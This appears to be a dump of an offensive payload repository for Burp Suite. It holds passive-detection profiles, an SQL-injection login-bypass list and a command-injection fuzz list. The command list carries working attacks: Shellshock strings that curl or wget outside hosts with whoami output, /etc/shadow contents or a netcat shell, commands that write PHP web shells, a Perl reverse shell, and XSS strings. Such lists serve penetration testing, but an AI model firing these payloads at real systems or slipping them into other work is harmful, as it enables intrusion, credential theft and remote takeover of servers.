1 | [{"Name":"PASSIVE - CMS Detection","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Wordpress","Drupal","Joomla","Magento","concre5","SharePoint","django","XOOPS","wp-","BigCommerce","Weebly","Ecwid","3dcart","WooCommerce"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"CMS Detected","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"CMS Detected","RemediationDetail":"CMS Detected","IssueBackground":"CMS Detected","RemediationBackground":"CMS Detected"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Cisco ASA Device Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Cisco ASA Device Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["+CSCOE+"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Cisco ASA Device Found (Passive)","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Cisco ASA Device Found (Passive)","RemediationDetail":"Cisco ASA Device Found (Passive)","IssueBackground":"Cisco ASA Device Found (Passive)","RemediationBackground":"Cisco ASA Device Found (Passive)"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Credentials Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Credentials Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["username","password"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Credentials Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Credentials Found","RemediationDetail":"Credentials Found","IssueBackground":"Credentials Found","RemediationBackground":"Credentials Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Forgot Password Form.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Forgot Password Form","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Forgot your password","Forgot password","Forgot email","Forgot username"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Forgot Password Form","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Forgot Password Form","RemediationDetail":"Forgot Password Form","IssueBackground":"Forgot Password Form","RemediationBackground":"Forgot Password Form"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Form Submission Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Form Submission Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["\u003cform "],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Form Submission Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Form Submission Found","RemediationDetail":"Form Submission Found","IssueBackground":"Form Submission Found","RemediationBackground":"Form Submission Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Interesting Pages.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Interesting Pages","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Login","Register","Lost your password","Reset password","Username","Password","admin","Sign Up","Signin"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Interesting Pages","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Interesting Pages","RemediationDetail":"Interesting Pages","IssueBackground":"Interesting Pages","RemediationBackground":"Interesting Pages"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Java De-Serialization.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Java De-Serialization","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["javax.faces.ViewState"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Java De-Serialization","IssueSeverity":"Medium","IssueConfidence":"Tentative","IssueDetail":"Java De-Serialization","RemediationDetail":"Java De-Serialization","IssueBackground":"Java De-Serialization","RemediationBackground":"Java De-Serialization"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Jenkins Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Jenkins Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Jenkins"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Jenkins Found","IssueSeverity":"Medium","IssueConfidence":"Tentative","IssueDetail":"Jenkins Found","RemediationDetail":"Jenkins Found","IssueBackground":"Jenkins Found","RemediationBackground":"Jenkins Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Login Page Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Login Page Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Login"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Login Page Found","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Login Page Found","RemediationDetail":"Login Page Found","IssueBackground":"Login Page Found","RemediationBackground":"Login Page Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Private Key Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Private Key Found","Active":true,"Scanner":1,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["PRIVATE KEY"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Private Key Found","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Private Key Found","RemediationDetail":"Private Key Found","IssueBackground":"Private Key Found","RemediationBackground":"Private Key Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Redirect Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Redirect Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Location: "],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Redirect Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Redirect Found","RemediationDetail":"Redirect Found","IssueBackground":"Redirect Found","RemediationBackground":"Redirect Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Registration Page Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Registration Page Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Register","Create Account"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Registration Page Found","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Registration Page Found","RemediationDetail":"Registration Page Found","IssueBackground":"Registration Page Found","RemediationBackground":"Registration Page Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Session Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Session Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["session"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Session Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Session Found","RemediationDetail":"Session Found","IssueBackground":"Session Found","RemediationBackground":"Session Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Subscribe Form Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Subscribe Form Found","Active":true,"Scanner":1,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Subscribe","Sign Up"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":0,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Subscribe Form Found","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Subscribe Form Found","RemediationDetail":"Subscribe Form Found","IssueBackground":"Subscribe Form Found","RemediationBackground":"Subscribe Form Found"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Token Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Token Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["token"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Token Found!","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Token Found!","RemediationDetail":"Token Found!","IssueBackground":"Token Found!","RemediationBackground":"Token Found!"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - Version Disclosure.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - Version Disclosure","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["ASP.NET","PHP","Apache","Linux","Windows","JBoss","Ruby","Python","Cowboy","nginx","IIS","X-Powered-By","Server: "],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Version Disclosure","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Version Disclosure","RemediationDetail":"Version Disclosure","IssueBackground":"Version Disclosure","RemediationBackground":"Version Disclosure"}]


--------------------------------------------------------------------------------
/BurpBountyPayloads/PASSIVE - WAF Found.bb:
--------------------------------------------------------------------------------
1 | [{"Name":"PASSIVE - WAF Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Cloudflare","Imperva","NetScaler"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"WAF Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"WAF Found","RemediationDetail":"WAF Found","IssueBackground":"WAF Found","RemediationBackground":"WAF Found"}]


--------------------------------------------------------------------------------
/BurpsuiteIntruderPayloads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/BurpsuiteIntruderPayloads.png


--------------------------------------------------------------------------------
/FuzzLists/auth_bypass.txt:
--------------------------------------------------------------------------------
  1 | ==
  2 | =
  3 | '
  4 | ' --
  5 | ' #
  6 | ' –
  7 | '--
  8 | '/*
  9 | '#
 10 | " --
 11 | " #
 12 | "/*
 13 | ' and 1='1
 14 | ' and a='a
 15 |  or 1=1
 16 |  or true
 17 | ' or ''='
 18 | " or ""="
 19 | 1′) and '1′='1–
 20 | ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
 21 | " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
 22 |  and 1=1
 23 |  and 1=1–
 24 | ' and 'one'='one
 25 | ' and 'one'='one–
 26 | ' group by password having 1=1--
 27 | ' group by userid having 1=1--
 28 | ' group by username having 1=1--
 29 |  like '%'
 30 |  or 0=0 --
 31 |  or 0=0 #
 32 |  or 0=0 –
 33 | ' or         0=0 #
 34 | ' or 0=0 --
 35 | ' or 0=0 #
 36 | ' or 0=0 –
 37 | " or 0=0 --
 38 | " or 0=0 #
 39 | " or 0=0 –
 40 | %' or '0'='0
 41 |  or 1=1
 42 |  or 1=1--
 43 |  or 1=1/*
 44 |  or 1=1#
 45 |  or 1=1–
 46 | ' or 1=1--
 47 | ' or '1'='1
 48 | ' or '1'='1'--
 49 | ' or '1'='1'/*
 50 | ' or '1'='1'#
 51 | ' or '1′='1
 52 | ' or 1=1
 53 | ' or 1=1 --
 54 | ' or 1=1 –
 55 | ' or 1=1--
 56 | ' or 1=1;#
 57 | ' or 1=1/*
 58 | ' or 1=1#
 59 | ' or 1=1–
 60 | ') or '1'='1
 61 | ') or '1'='1--
 62 | ') or '1'='1'--
 63 | ') or '1'='1'/*
 64 | ') or '1'='1'#
 65 | ') or ('1'='1
 66 | ') or ('1'='1--
 67 | ') or ('1'='1'--
 68 | ') or ('1'='1'/*
 69 | ') or ('1'='1'#
 70 | 'or'1=1
 71 | 'or'1=1′
 72 | " or "1"="1
 73 | " or "1"="1"--
 74 | " or "1"="1"/*
 75 | " or "1"="1"#
 76 | " or 1=1
 77 | " or 1=1 --
 78 | " or 1=1 –
 79 | " or 1=1--
 80 | " or 1=1/*
 81 | " or 1=1#
 82 | " or 1=1–
 83 | ") or "1"="1
 84 | ") or "1"="1"--
 85 | ") or "1"="1"/*
 86 | ") or "1"="1"#
 87 | ") or ("1"="1
 88 | ") or ("1"="1"--
 89 | ") or ("1"="1"/*
 90 | ") or ("1"="1"#
 91 | ) or '1′='1–
 92 | ) or ('1′='1–
 93 | ' or 1=1 LIMIT 1;#
 94 | 'or 1=1 or ''='
 95 | "or 1=1 or ""="
 96 | ' or 'a'='a
 97 | ' or a=a--
 98 | ' or a=a–
 99 | ') or ('a'='a
100 | " or "a"="a
101 | ") or ("a"="a
102 | ') or ('a'='a and hi") or ("a"="a
103 | ' or 'one'='one
104 | ' or 'one'='one–
105 | ' or uid like '%
106 | ' or uname like '%
107 | ' or userid like '%
108 | ' or user like '%
109 | ' or username like '%
110 | ' or 'x'='x
111 | ') or ('x'='x
112 | " or "x"="x
113 | ' OR 'x'='x'#;
114 | '=' 'or' and '=' 'or'
115 | ' UNION ALL SELECT 1, @@version;#
116 | ' UNION ALL SELECT system_user(),user();#
117 | ' UNION select table_schema,table_name FROM information_Schema.tables;#
118 | admin' and substring(password/text(),1,1)='7
119 | ' and substring(password/text(),1,1)='7
120 | 
121 | 


--------------------------------------------------------------------------------
/FuzzLists/bad_chars.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/FuzzLists/bad_chars.txt


--------------------------------------------------------------------------------
/FuzzLists/command_exec.txt:
--------------------------------------------------------------------------------
  1 | `
  2 | || 
  3 | | 
  4 | ; 
  5 | '
  6 | '"
  7 | "
  8 | "'
  9 | & 
 10 | && 
 11 | %0a
 12 | %0a%0d
 13 | %0Acat%20/etc/passwd
 14 | %0Aid
 15 | %0a id %0a
 16 | %0Aid%0A
 17 | %0a ping -i 30 127.0.0.1 %0a
 18 | %0A/usr/bin/id
 19 | %0A/usr/bin/id%0A
 20 | %2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
 21 | %20{${phpinfo()}}
 22 | %20{${sleep(20)}}
 23 | %20{${sleep(3)}}
 24 | a|id|
 25 | a;id|
 26 | a;id;
 27 | a;id\n
 28 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
 29 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
 30 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
 31 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
 32 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
 33 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
 34 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
 35 | () { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
 36 | () { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
 37 | () { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
 38 | () { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
 39 | () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
 40 | () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
 41 | () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
 42 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
 43 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
 44 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
 45 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
 46 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
 47 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
 48 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
 49 | cat /etc/hosts
 50 | $(`cat /etc/passwd`)
 51 | cat /etc/passwd
 52 | () { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
 53 | | curl http://crowdshield.com/.testing/rce.txt
 54 | & curl http://crowdshield.com/.testing/rce.txt
 55 | ; curl https://crowdshield.com/.testing/rce_vuln.txt
 56 | && curl https://crowdshield.com/.testing/rce_vuln.txt
 57 | curl https://crowdshield.com/.testing/rce_vuln.txt
 58 |  curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
 59 | curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
 60 | $(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
 61 | dir
 62 | | dir
 63 | ; dir
 64 | $(`dir`)
 65 | & dir
 66 | &&dir
 67 | && dir
 68 | | dir C:\
 69 | ; dir C:\
 70 | & dir C:\
 71 | && dir C:\
 72 | dir C:\
 73 | | dir C:\Documents and Settings\*
 74 | ; dir C:\Documents and Settings\*
 75 | & dir C:\Documents and Settings\*
 76 | && dir C:\Documents and Settings\*
 77 | dir C:\Documents and Settings\*
 78 | | dir C:\Users
 79 | ; dir C:\Users
 80 | & dir C:\Users
 81 | && dir C:\Users
 82 | dir C:\Users
 83 | ;echo%20'<script>alert(1)</script>'
 84 | echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
 85 | | echo "<?php include($_GET['page'])| ?>" > rfi.php
 86 | ; echo "<?php include($_GET['page']); ?>" > rfi.php
 87 | & echo "<?php include($_GET['page']); ?>" > rfi.php
 88 | && echo "<?php include($_GET['page']); ?>" > rfi.php
 89 | echo "<?php include($_GET['page']); ?>" > rfi.php
 90 | | echo "<?php system('dir $_GET['dir']')| ?>" > dir.php 
 91 | ; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php 
 92 | & echo "<?php system('dir $_GET['dir']'); ?>" > dir.php 
 93 | && echo "<?php system('dir $_GET['dir']'); ?>" > dir.php 
 94 | echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
 95 | | echo "<?php system($_GET['cmd'])| ?>" > cmd.php
 96 | ; echo "<?php system($_GET['cmd']); ?>" > cmd.php
 97 | & echo "<?php system($_GET['cmd']); ?>" > cmd.php
 98 | && echo "<?php system($_GET['cmd']); ?>" > cmd.php
 99 | echo "<?php system($_GET['cmd']); ?>" > cmd.php
100 | ;echo '<script>alert(1)</script>'
101 | echo '<script>alert(1)</script>'// XXXXXXXXXXX
102 | echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
103 | | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
104 | ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
105 | & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
106 | && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
107 | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
108 | () { :;}; echo vulnerable 10
109 | eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
110 | eval('ls')
